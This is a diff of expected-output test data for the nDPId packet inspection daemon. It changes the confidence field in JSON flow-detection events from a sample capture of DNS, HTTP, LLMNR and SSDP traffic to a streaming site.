00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104378454,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxYAAAER6ZnAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378557,"flow_last_seen":1470104378557,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104378557,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -88,25 +88,25 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1470104378770,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378770,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUcsAAIAR9HrAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1470104378901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} +00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} @@ -127,29 +127,29 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 